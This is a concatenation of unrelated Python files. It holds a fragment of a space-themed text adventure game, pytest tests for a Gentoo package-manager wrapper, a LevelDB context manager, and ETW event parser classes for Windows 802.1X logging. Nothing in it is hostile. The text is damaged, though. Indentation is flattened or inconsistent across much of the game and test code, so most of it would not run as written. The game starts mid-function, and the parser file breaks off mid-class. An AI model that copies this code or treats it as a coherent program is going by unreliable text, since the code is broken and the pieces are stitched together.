print("the man sees you and shoots you with a BRWD, a bob ross wig dart and you fall to the groud wounded")
else:
print("the man gets scared and drops the purse, you seethe money in it and decide to either A, try to find the woman, or B, and greedily steal it for your self ")
choice = input("What do you choose? ")
if choice == "C":
print("you cant find the woman, so you decide to go to Spacies to try to find the women")
else:
print(" A space cop sees you and hauld you off t0 mime prison")
spacies(item, money)
def bank(item,money):
print("Welcome to Zegumungs")
sleep(2)
print("Banking for the Stars since Decalon Beta was Decalon Alpha!")
sleep(2)
    office(item, money)
while True:
print(''' Welcome to Zegumungs!
This is what you can do at the bank:
0. Check your bank balance
1. Deposit Space Credits
    2. Withdraw Space Credits
3. Rob the bank
4. Buy the bank
''')
choice = input("Please pick an option")
        if choice == '1':
            print("You decide to deposit SC")
        elif choice == '0':
            print("You check your bank balance")
        elif choice == '2':
            print("You decide to withdraw SC")
        elif choice == '3':
            print("You decide to rob the bank")
        elif choice == '4':
            print("You decide to buy the bank")
print("The bank costs 10,000,000 SC, which is $",10_000_000 * 620)
print("The bank asks you to make an offer for how much you want to pay")
choice = input("How much do you offer to buy the bank?")
choice = int(choice)
            if choice >= random.randint(8_000_000, 10_000_000):
print("You are now the owner of the bank!")
else:
print("You do not buy the bank")
else:
print("Please pick a valid option")
def office(item,money):
print('''
__________________________________________
|.'', Welcome to the Bank ,''.|
|.'.'', ,''.'.|
|.'.'.'', ,''.'.'.|
|.'.'.'.'', ,''.'.'.'.|
|.'.'.'.'.| |.'.'.'.'.|
|.'.'.'.'.|===; ;===|.'.'.'.'.|
|.'.'.'.'.|:::|', ,'|:::|.'.'.'.'.|
|.'.'.'.'.|---|'.|, _______ ,|.'|---|.'.'.'.'.|
|.'.'.'.'.|:::|'.|'|???????|'|.'|:::|.'.'.'.'.|
|,',',',',|---|',|'|???????|'|,'|---|,',',',',|
|.'.'.'.'.|:::|'.|'|???????|'|.'|:::|.'.'.'.'.|
|.'.'.'.'.|---|',' /%%%\ ','|---|.'.'.'.'.|
|.'.'.'.'.|===:' /%%%%%\ ':===|.'.'.'.'.|
|.'.'.'.'.|%%%%%%%%%%%%%%%%%%%%%%%%%|.'.'.'.'.|
|.'.'.'.',' /%%%%%%%%%\ ','.'.'.'.|
|.'.'.',' /%%%%%%%%%%%\ ','.'.'.|
|.'.',' /%%%%%%%%%%%%%\ ','.'.|
|.',' /%%%%%%%%%%%%%%%\ ','.|
|;____________/%%%%%Spicer%%%%%%\____________;|
''')
def perform(item, money):
print("You go to a fancy party hall and perform your mime routine for")
print("the many assembeled guests")
def training(item, money):
print("'See us next week, and see if you are prepared for your lightsaber, we shall.'")
print("You enter a room with a sign above it stating 'FREE CUPCAKES'. You see Baby Yoda.. he walks up to you")
sleep(2)
print("'Train you to be a Jedi like E.T., I shall.' He says.")
sleep(2)
choice = input("Do you accept your training? Y or N.")
if choice == 'N':
print("E.T. is dissapointed. He thinks you may be a Sith. He jumps up from behind you and stabs you in the back with his orange lightsaber.")
sleep(2)
print("The medics come and E.T. claims he has nothing to do with your injury.")
sleep(2)
print("You are unconscious, but the medics frown and quickly put a fast-working healing serum on your wound.")
sleep(2)
print("E.T. and Baby Yoda high-five after the medics have dragged you out of the room ona stretcher. Another potential Sith defeated.")
else:
print("Baby Yoda happily smiles at you, an you can see E.T. in the dark hallway ahead nodding.")
sleep(2)
print("Baby Yoda leads you down the dark hallway, and E.T. joins him.")
sleep(2)
print("Baby Yoda looks up at you and says 'Now, your training begins, young Padawan.'")
sleep(2)
print("Young? YOUNG? you are obviously centuries old, as any space and time traveling mime is!")
sleep(2)
print("And Padawan? Pffttttt! What was this? the 347th century? You are a glorious bell, as your name states.")
sleep(2)
print("You should, quite obviously, be called and referred to as 'Master Mime', for that is who you are.")
sleep(2)
print("Only your closest friends could ever call you Isabel. Padawan? Why, you are so much more!")
sleep(2)
print("You roll your eyes and sigh.")
sleep(2)
print("E.T. complains to Baby Yoda in an entirely different language. One of the few languages unfamiliar to you.")
sleep(2)
print("'Brought you here to groan, I have not.' Why did Baby Yoda have to be so rude?")
sleep(2)
print("He tells you one last thing before sending you off...")
sleep(2)
print("'Next week, see us. Decide if you are yet worthy of a lightsaber, we then will.'")
def Tavern(item, money):
print("You are about to enter the next room when a man is thrown out of the door. He is knocked unconscious.")
choice = input("Do you search him for anything of value? y/n")
if choice =='y':
print("You search him and find 30 space credits in his space wallet.")
        money += 30
else:
print("You decide it's best not to search someone while they're knocked out. You never know if they will wake up as you're doing it.")
print("You enter what is known as the stary sky tavern, the few patrons of the place already sat down and enjoying their drinks.")
#print('When you walk in an employee of the tavern walked up to you, asking you "Hello')
#print('maam, what are you here for?')
def tavern_menu(item,money):
""" THis is what this function is about"""
    print('''Your options are:
    1. Rent a room to rest (20 SC)
    2. Order a drink (5 SC)
    3. Order a meal (10 SC)
    4. Ponder why you are here''')
choice=input("So what would you like? (press 0 to leave to another destination)")
    if choice == '1':
if money > 19:
print("You are handed a key, walking to the room that key unlocks. You lay down and rest")
else:
print ("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
    elif choice == '2':
if money > 4:
print("You buy a drink, taking a seat and chugging it down. You would gain some kind of drunk status effect if I knew how to write one.")
else:
print("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
    elif choice == '3':
if money > 14:
print("You enjoy a hefty meal, devouring it. You can't remember the last time you ate, the last time you actually ate was a terrible mint chip muffin.")
else:
print("You realize you don't have enough money and reconsider your choice")
tavern_menu(item,money)
'''
elif choice == 4:
print("You say that you choose to ponder, the employee giving you something to ponder on and asks")
print("You ever wonder why were here?")
print("""You respond with"" It's one of life's great mysteries isn't it? Why are we here? I mean, are we the product of some cosmic coincidence, or is there really a God watching everything? You know, with a plan for us and stuff. I don't know, but it keeps me up at night.""")
print("They just stare at you, a bit weirded out""No I mean at this station... so... is there anything you'd actually like?" ")
tavern_menu(item,money)
else:
print("You decide to just leave and not do anything, leaving after saying goodbye")
intro(item,money)'''
def bell_room(item,money):
print("you enter a room with a sign above it saying the you will die room. You are but a small bell who is stupid enough to enter.")
sleep(2)
print("you go in and a voice says answer my riddle and you won't die")
sleep(2)
print("I speak without a mouth and hear without ears. I have no body, but I come alive with wind. What am I?")
sleep(2)
print("a(n) what")
sleep(2)
choice = input("Make a choice")
    if choice.strip().lower() == 'an echo':
print('you have been spared and walk out of the room safely')
else:
print("you got it wrong you run for the door and somehow make it out safely but lost 3 fingers")
def miles(item,money):
print("you fall into a hole of some kind and see lots of strange writing.")
sleep(2)
choice = input("do you traslate the writing? y/n ")
sleep(2)
if choice == 'y':
print("you pull out you trusty transalator and hold it up to the writing. It translates to Joe Mamma")
else:
print("You climb out the hole and pretend nothing happend. You wounder why the writing looked familiar")
def trivia(item,money):
counter = 1
points = 0
while True:
print("You have",points,"points")
triviaurl = 'https://opentdb.com/api.php?amount=1&difficulty=easy&type=multiple'
response = urllib.request.urlopen(triviaurl)
result = json.loads(response.read())
#print(result)
questions = []
questions.append(result["results"][0]["correct_answer"])
for wrong in result["results"][0]["incorrect_answers"]:
questions.append(wrong)
random.shuffle(questions)
print("Question",counter)
counter += 1
print(result["results"][0]["question"])
print("Your options are:")
        for answer in questions:
            print(answer)
choice = input("What is your answer?")
if choice.lower() == result["results"][0]["correct_answer"].lower():
print("You are right!")
points += 1
money += 5
else:
print("You are wrong")
print("The correct answer is:",result["results"][0]["correct_answer"])
print("You lose 2 SC")
print(f"You have {money}SC")
points -= 1
money -= 2
choice = input("Play again? y/n")
if choice == 'n':
break
intro(item,money)
intro(item,money)
|
from unittest.mock import patch
from pytest import mark
@mark.parametrize('return_code, pretend, world', [(b'0', False, False), (b'0', True, False),
(b'0', True, True), (b'1', False, False),
(b'1', False, True), (b'1', True, False),
(b'1', True, True)])
def test_deep_clean_not_run(return_code, pretend, world):
from argparse import Namespace
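    # deep_clean should act only when emerge exited 0, was not a pretend run,
    # and targeted @world; these seven parameter sets cover every other
    # combination, each of which must be a no-op.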
with patch('pyerge.tmerge.check_emerge_opts') as check_emerge_opts_mock, \
patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.deep_run') as deep_run_mock:
from pyerge import tmerge
check_emerge_opts_mock.return_value = (pretend, world)
tmerge.deep_clean([''], Namespace(), return_code)
emerge_mock.assert_not_called()
deep_run_mock.assert_not_called()
def test_deep_clean_run():
from argparse import Namespace
with patch('pyerge.tmerge.check_emerge_opts') as check_emerge_opts_mock, \
patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.deep_run') as deep_run_mock:
from pyerge import tmerge
opts = Namespace()
output_and_rc = b'0'
check_emerge_opts_mock.return_value = (False, True)
emerge_mock.return_value = (output_and_rc, output_and_rc)
tmerge.deep_clean([''], opts, output_and_rc)
emerge_mock.assert_called_once_with(['-pc'], build=False)
deep_run_mock.assert_called_once_with(opts, output_and_rc)
def test_deep_run_not_selected():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
tmerge.deep_run(opts=Namespace(deep_run=False), output=b'')
emerge_mock.assert_not_called()
def test_deep_run_wrong_output():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
tmerge.deep_run(opts=Namespace(deep_run=True), output=b'All selected packages: ')
emerge_mock.assert_not_called()
def test_deep_run_output_with_two_packages():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
output = b'\n\nAll selected packages: =sys-kernel/gentoo-sources-5.10.76-r1 =dev-python/hypothesis-6.27.1\n\n'
opts = Namespace(deep_run=True)
tmerge.deep_run(opts=opts, output=output)
emerge_mock.assert_called_once_with(['-c', '=dev-python/hypothesis-6.27.1'], build=True)
def test_deep_run_output_with_only_gentoo():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock:
from pyerge import tmerge
output = b'\n\nAll selected packages: =sys-kernel/gentoo-sources-5.10.76-r1\n\n'
opts = Namespace(deep_run=True)
tmerge.deep_run(opts=opts, output=output)
emerge_mock.assert_not_called()
@mark.parametrize('list_str, result', [(['--pretend', '--verbose', '--newuse', '--deep', '--update', '@world'], (True, True)),
(['--pretend', '--verbose', 'conky'], (True, False)),
(['-f', 'conky'], (False, False)),
(['', '@world'], (False, True)),
(['', 'conky'], (False, False))])
def test_check_emerge_opts(list_str, result):
from pyerge import tmerge
assert tmerge.check_emerge_opts(list_str) == result
def test_is_portage_running():
from pyerge import tmerge
with patch('pyerge.tmerge.utils') as utils_mock:
utils_mock.run_cmd.return_value = (b'3456\n', b'')
assert tmerge.is_portage_running() is True
utils_mock.run_cmd.assert_called_once_with('pgrep -f /usr/bin/emerge')
def test_is_portage_not_running():
from pyerge import tmerge
with patch('pyerge.tmerge.utils') as utils_mock:
utils_mock.run_cmd.return_value = (b'', b'')
assert tmerge.is_portage_running() is False
utils_mock.run_cmd.assert_called_once_with('pgrep -f /usr/bin/emerge')
def test_run_emerge():
from argparse import Namespace
with patch('pyerge.tmerge.emerge') as emerge_mock, \
patch('pyerge.tmerge.post_emerge') as post_emerge_mock, \
patch('pyerge.tmerge.deep_clean') as deep_clean:
ret_code = b'0'
emerge_mock.return_value = (ret_code, b'')
from pyerge import tmerge
emerge_opts = ['-NDu', '@world']
opts = Namespace(action='emerge', online=True, deep_print=True)
tmerge.run_emerge(emerge_opts=emerge_opts, opts=opts)
post_emerge_mock.assert_called_once_with(emerge_opts, ret_code)
deep_clean.assert_called_once_with(emerge_opts, opts, ret_code)
def test_run_check():
from argparse import Namespace
with patch('pyerge.tmerge.check_upd') as check_upd_mock:
from pyerge import tmerge
opts = Namespace(action='check', local=True, online=True)
tmerge.run_check(opts)
check_upd_mock.assert_called_once_with(opts.local)
|
from contextlib import contextmanager
from inspect import currentframe, getargvalues
import plyvel
@contextmanager
def open_leveldb(name,
create_if_missing=False,
error_if_exists=False,
paranoid_checks=None,
write_buffer_size=None,
max_open_files=None,
lru_cache_size=None,
block_size=None,
block_restart_interval=None,
compression='snappy',
bloom_filter_bits=0,
comparator=None,
comparator_name=None):
"""Context manager for plyvel leveldb interface.
See plyvel.DB.__init__ documentation to learn more about args.
"""
_, _, _, kwargs = getargvalues(currentframe())
db = plyvel.DB(**kwargs)
try:
yield db
finally:
db.close()
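# Example usage (hypothetical path; requires plyvel and a writable directory):
#
#     with open_leveldb('/tmp/example-db', create_if_missing=True) as db:
#         db.put(b'key', b'value')
#         assert db.get(b'key') == b'value'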
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-OneX
GUID : ab0d8ef9-866d-4d39-b83f-453f3b8f6325
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=1, version=0)
class Microsoft_Windows_OneX_1_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=2, version=0)
class Microsoft_Windows_OneX_2_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=3, version=0)
class Microsoft_Windows_OneX_3_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=4, version=0)
class Microsoft_Windows_OneX_4_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul,
"EAPMethodType" / Int8ul,
"RootCauseString" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=5, version=0)
class Microsoft_Windows_OneX_5_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=6, version=0)
class Microsoft_Windows_OneX_6_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=7, version=0)
class Microsoft_Windows_OneX_7_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UserDataSize" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=8, version=0)
class Microsoft_Windows_OneX_8_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UserDataSize" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=9, version=0)
class Microsoft_Windows_OneX_9_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=10, version=0)
class Microsoft_Windows_OneX_10_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Response" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=11, version=0)
class Microsoft_Windows_OneX_11_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=12, version=0)
class Microsoft_Windows_OneX_12_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=13, version=0)
class Microsoft_Windows_OneX_13_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=14, version=0)
class Microsoft_Windows_OneX_14_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=15, version=0)
class Microsoft_Windows_OneX_15_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=16, version=0)
class Microsoft_Windows_OneX_16_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=17, version=0)
class Microsoft_Windows_OneX_17_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=18, version=0)
class Microsoft_Windows_OneX_18_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=19, version=0)
class Microsoft_Windows_OneX_19_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=20, version=0)
class Microsoft_Windows_OneX_20_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=21, version=0)
class Microsoft_Windows_OneX_21_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=22, version=0)
class Microsoft_Windows_OneX_22_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=23, version=0)
class Microsoft_Windows_OneX_23_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=24, version=0)
class Microsoft_Windows_OneX_24_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=25, version=0)
class Microsoft_Windows_OneX_25_0(Etw):
pattern = Struct(
"WarningCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=26, version=0)
class Microsoft_Windows_OneX_26_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=27, version=0)
class Microsoft_Windows_OneX_27_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=28, version=0)
class Microsoft_Windows_OneX_28_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=29, version=0)
class Microsoft_Windows_OneX_29_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=30, version=0)
class Microsoft_Windows_OneX_30_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=31, version=0)
class Microsoft_Windows_OneX_31_0(Etw):
pattern = Struct(
"ProfilesCount" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=32, version=0)
class Microsoft_Windows_OneX_32_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul,
"AuthMode" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=33, version=0)
class Microsoft_Windows_OneX_33_0(Etw):
pattern = Struct(
"EAPMethodType" / Int8ul,
"MediaType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=34, version=0)
class Microsoft_Windows_OneX_34_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=35, version=0)
class Microsoft_Windows_OneX_35_0(Etw):
pattern = Struct(
"ChangeType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=36, version=0)
class Microsoft_Windows_OneX_36_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"FriendlyName" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=37, version=0)
class Microsoft_Windows_OneX_37_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=38, version=0)
class Microsoft_Windows_OneX_38_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"UIRequestCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=39, version=0)
class Microsoft_Windows_OneX_39_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=40, version=0)
class Microsoft_Windows_OneX_40_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"PacketLength" / Int16ul,
"PacketType" / Int32ul,
"Identifier" / Int8ul,
"EapMethodType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=41, version=0)
class Microsoft_Windows_OneX_41_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=42, version=0)
class Microsoft_Windows_OneX_42_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=43, version=0)
class Microsoft_Windows_OneX_43_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=44, version=0)
class Microsoft_Windows_OneX_44_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=45, version=0)
class Microsoft_Windows_OneX_45_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=46, version=0)
class Microsoft_Windows_OneX_46_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"TimeTaken" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=47, version=0)
class Microsoft_Windows_OneX_47_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"AuthIdentity" / WString,
"SessionId" / Int32ul,
"Username" / WString,
"Domain" / WString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=48, version=0)
class Microsoft_Windows_OneX_48_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=49, version=0)
class Microsoft_Windows_OneX_49_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=50, version=0)
class Microsoft_Windows_OneX_50_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=51, version=0)
class Microsoft_Windows_OneX_51_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=52, version=0)
class Microsoft_Windows_OneX_52_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=53, version=0)
class Microsoft_Windows_OneX_53_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=54, version=0)
class Microsoft_Windows_OneX_54_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=55, version=0)
class Microsoft_Windows_OneX_55_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"SessionId" / Int32ul,
"UIRequestSessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=56, version=0)
class Microsoft_Windows_OneX_56_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Size" / Int32ul,
"SessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=57, version=0)
class Microsoft_Windows_OneX_57_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Reason" / Int32ul,
"SessionId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=58, version=0)
class Microsoft_Windows_OneX_58_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=59, version=0)
class Microsoft_Windows_OneX_59_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"WinError" / Int32ul,
"ReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60, version=0)
class Microsoft_Windows_OneX_60_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=61, version=0)
class Microsoft_Windows_OneX_61_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=62, version=0)
class Microsoft_Windows_OneX_62_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=63, version=0)
class Microsoft_Windows_OneX_63_0(Etw):
pattern = Struct(
"Result" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=64, version=0)
class Microsoft_Windows_OneX_64_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"PacketLength" / Int16ul,
"PacketType" / Int32ul,
"Identifier" / Int8ul,
"EapMethodType" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=65, version=0)
class Microsoft_Windows_OneX_65_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"Identity" / CString
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=66, version=0)
class Microsoft_Windows_OneX_66_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"ExplicitCredentials" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=68, version=0)
class Microsoft_Windows_OneX_68_0(Etw):
pattern = Struct(
"PortId" / Int32ul,
"ExplicitCredentials" / Int8ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=70, version=0)
class Microsoft_Windows_OneX_70_0(Etw):
pattern = Struct(
"PortId" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60001, version=0)
class Microsoft_Windows_OneX_60001_0(Etw):
pattern = Struct(
"ErrorCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60002, version=0)
class Microsoft_Windows_OneX_60002_0(Etw):
pattern = Struct(
"WarningCode" / Int32ul,
"Location" / Int32ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60003, version=0)
class Microsoft_Windows_OneX_60003_0(Etw):
pattern = Struct(
"NextState" / Int8ul,
"Context" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60004, version=0)
class Microsoft_Windows_OneX_60004_0(Etw):
pattern = Struct(
"Context" / Int32ul,
"UpdateReasonCode" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60101, version=0)
class Microsoft_Windows_OneX_60101_0(Etw):
pattern = Struct(
"SourceAddress" / Int32ul,
"SourcePort" / Int32ul,
"DestinationAddress" / Int32ul,
"DestinationPort" / Int32ul,
"Protocol" / Int32ul,
"ReferenceContext" / Int32ul
)
@declare(guid=guid("ab0d8ef9-866d-4d39-b83f-453f3b8f6325"), event_id=60102, version=0)
class Microsoft_Windows_OneX_60102_0(Etw):
pattern = Struct(
"SourcePort" / Int32ul,
